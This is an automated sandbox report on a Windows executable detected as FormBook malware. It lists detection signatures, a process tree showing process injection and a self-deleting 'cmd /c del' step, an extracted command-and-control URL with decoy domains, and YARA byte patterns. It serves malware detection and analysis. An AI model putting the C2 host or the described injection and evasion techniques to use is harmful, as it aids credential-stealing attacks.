Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report CNEW ORDER17.exe

Overview

General Information

Sample Name:CNEW ORDER17.exe
Analysis ID:502245
MD5:c54edc9ef9d72fe0fe048e8ac884626b
SHA1:11dce70f33e490eb9b89726776915a374bb59a59
SHA256:43fcb442b80665d42271689310ebd569e84f74287063a62e14beba808178e098
Tags:exeformbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • CNEW ORDER17.exe (PID: 4344 cmdline: 'C:\Users\user\Desktop\CNEW ORDER17.exe' MD5: C54EDC9EF9D72FE0FE048E8AC884626B)
    • CNEW ORDER17.exe (PID: 5680 cmdline: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe MD5: C54EDC9EF9D72FE0FE048E8AC884626B)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • raserver.exe (PID: 4632 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
        • cmd.exe (PID: 4476 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cursoukulelegospel.com/h0c4/"], "decoy": ["looknewly.com", "icha2016.com", "datnenhoalachn.xyz", "fark.ltd", "zjlj.site", "carpinteriacansino.com", "atozmp33.com", "oficialacesso.com", "tuningfrance.com", "rmm-mx96r.net", "outsidestyleshop.com", "eufundas.com", "a91furniture.com", "sfme.net", "englisch.coach", "wallacechen.info", "nyayeo.com", "jintongstore.com", "vanwerknaarwerk.info", "thekimlab.net", "morvirtualassistant.com", "ichatbengal.com", "doctors-technology.com", "mississippisms.com", "koopa.codes", "sproutheads.com", "gardenkitchenspa.com", "hoom.life", "wiselogistic.com", "appadaptor.com", "jumtix.xyz", "academiavirtualjjb.com", "pcmrmf.com", "hlsx069.com", "sunielkapoor.com", "truetaster.com", "rylautosales.com", "cgmobile.net", "www-inloggen-nl.info", "businesswebstrategy.net", "fetch-a-sg-hair-transplant.fyi", "paintingservicespune.com", "cakeeyes.net", "tandebrokers.com", "navigantcapitalpartners.com", "hubska.com", "foillaws.com", "battletraining.com", "bitcoin-recovery.com", "yourbuildvideos.com", "naturalsumaq.com", "prasikapsychotherapy.com", "jphousecleaningservices.com", "fetch-hepatitis-c.zone", "easypay-agent.com", "ronaldcraig.com", "highonloveshop.com", "bayharborislandhouse2.com", "aventuramaker.com", "han-chill.com", "wrapmeupbkk.com", "videomarketing.tips", "ishouldntbthareasonugohard.com", "psychotherapie-wermuth.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x2685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x2171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x2787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x28ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x13ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x84f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x94fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x5419:$sqlite3step: 68 34 1C 7B E1
    • 0x552c:$sqlite3step: 68 34 1C 7B E1
    • 0x5448:$sqlite3text: 68 38 2A 90 C5
    • 0x556d:$sqlite3text: 68 38 2A 90 C5
    • 0x545b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x5583:$sqlite3blob: 68 53 D8 7F 8C
    00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      15.2.CNEW ORDER17.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        15.2.CNEW ORDER17.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        15.2.CNEW ORDER17.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17619:$sqlite3step: 68 34 1C 7B E1
        • 0x1772c:$sqlite3step: 68 34 1C 7B E1
        • 0x17648:$sqlite3text: 68 38 2A 90 C5
        • 0x1776d:$sqlite3text: 68 38 2A 90 C5
        • 0x1765b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17783:$sqlite3blob: 68 53 D8 7F 8C
        15.2.CNEW ORDER17.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          15.2.CNEW ORDER17.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cursoukulelegospel.com/h0c4/"], "decoy": ["looknewly.com", "icha2016.com", "datnenhoalachn.xyz", "fark.ltd", "zjlj.site", "carpinteriacansino.com", "atozmp33.com", "oficialacesso.com", "tuningfrance.com", "rmm-mx96r.net", "outsidestyleshop.com", "eufundas.com", "a91furniture.com", "sfme.net", "englisch.coach", "wallacechen.info", "nyayeo.com", "jintongstore.com", "vanwerknaarwerk.info", "thekimlab.net", "morvirtualassistant.com", "ichatbengal.com", "doctors-technology.com", "mississippisms.com", "koopa.codes", "sproutheads.com", "gardenkitchenspa.com", "hoom.life", "wiselogistic.com", "appadaptor.com", "jumtix.xyz", "academiavirtualjjb.com", "pcmrmf.com", "hlsx069.com", "sunielkapoor.com", "truetaster.com", "rylautosales.com", "cgmobile.net", "www-inloggen-nl.info", "businesswebstrategy.net", "fetch-a-sg-hair-transplant.fyi", "paintingservicespune.com", "cakeeyes.net", "tandebrokers.com", "navigantcapitalpartners.com", "hubska.com", "foillaws.com", "battletraining.com", "bitcoin-recovery.com", "yourbuildvideos.com", "naturalsumaq.com", "prasikapsychotherapy.com", "jphousecleaningservices.com", "fetch-hepatitis-c.zone", "easypay-agent.com", "ronaldcraig.com", "highonloveshop.com", "bayharborislandhouse2.com", "aventuramaker.com", "han-chill.com", "wrapmeupbkk.com", "videomarketing.tips", "ishouldntbthareasonugohard.com", "psychotherapie-wermuth.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 15.2.CNEW ORDER17.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.CNEW ORDER17.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, type: MEMORY
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: CNEW ORDER17.exeAvira: detected
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeAvira: detection malicious, Label: HEUR/AGEN.1142543
          Machine Learning detection for sampleShow sources
          Source: CNEW ORDER17.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeJoe Sandbox ML: detected
          Source: 15.2.CNEW ORDER17.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: CNEW ORDER17.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: CNEW ORDER17.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: CNEW ORDER17.exe, 0000000F.00000002.519709359.0000000000FB0000.00000040.00000001.sdmp, raserver.exe, 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdb source: CNEW ORDER17.exe, 0000000F.00000002.521099012.0000000003030000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: CNEW ORDER17.exe, 0000000F.00000002.519709359.0000000000FB0000.00000040.00000001.sdmp, raserver.exe
          Source: Binary string: RAServer.pdbGCTL source: CNEW ORDER17.exe, 0000000F.00000002.521099012.0000000003030000.00000040.00020000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 4x nop then pop edi15_2_00416C93
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi18_2_02E56C93

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.cursoukulelegospel.com/h0c4/
          Source: CNEW ORDER17.exe, 0000000F.00000002.519538682.0000000000B7A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 15.2.CNEW ORDER17.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.CNEW ORDER17.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 15.2.CNEW ORDER17.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.CNEW ORDER17.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.2.CNEW ORDER17.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.CNEW ORDER17.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: CNEW ORDER17.exe
          Source: CNEW ORDER17.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 15.2.CNEW ORDER17.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.2.CNEW ORDER17.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.2.CNEW ORDER17.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.2.CNEW ORDER17.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_0040103015_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_0041E8F315_2_0041E8F3
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_0041E1F915_2_0041E1F9
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_0041D30015_2_0041D300
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00402D8715_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00402D9015_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00409E4015_2_00409E40
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00409E3C15_2_00409E3C
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00402FB015_2_00402FB0
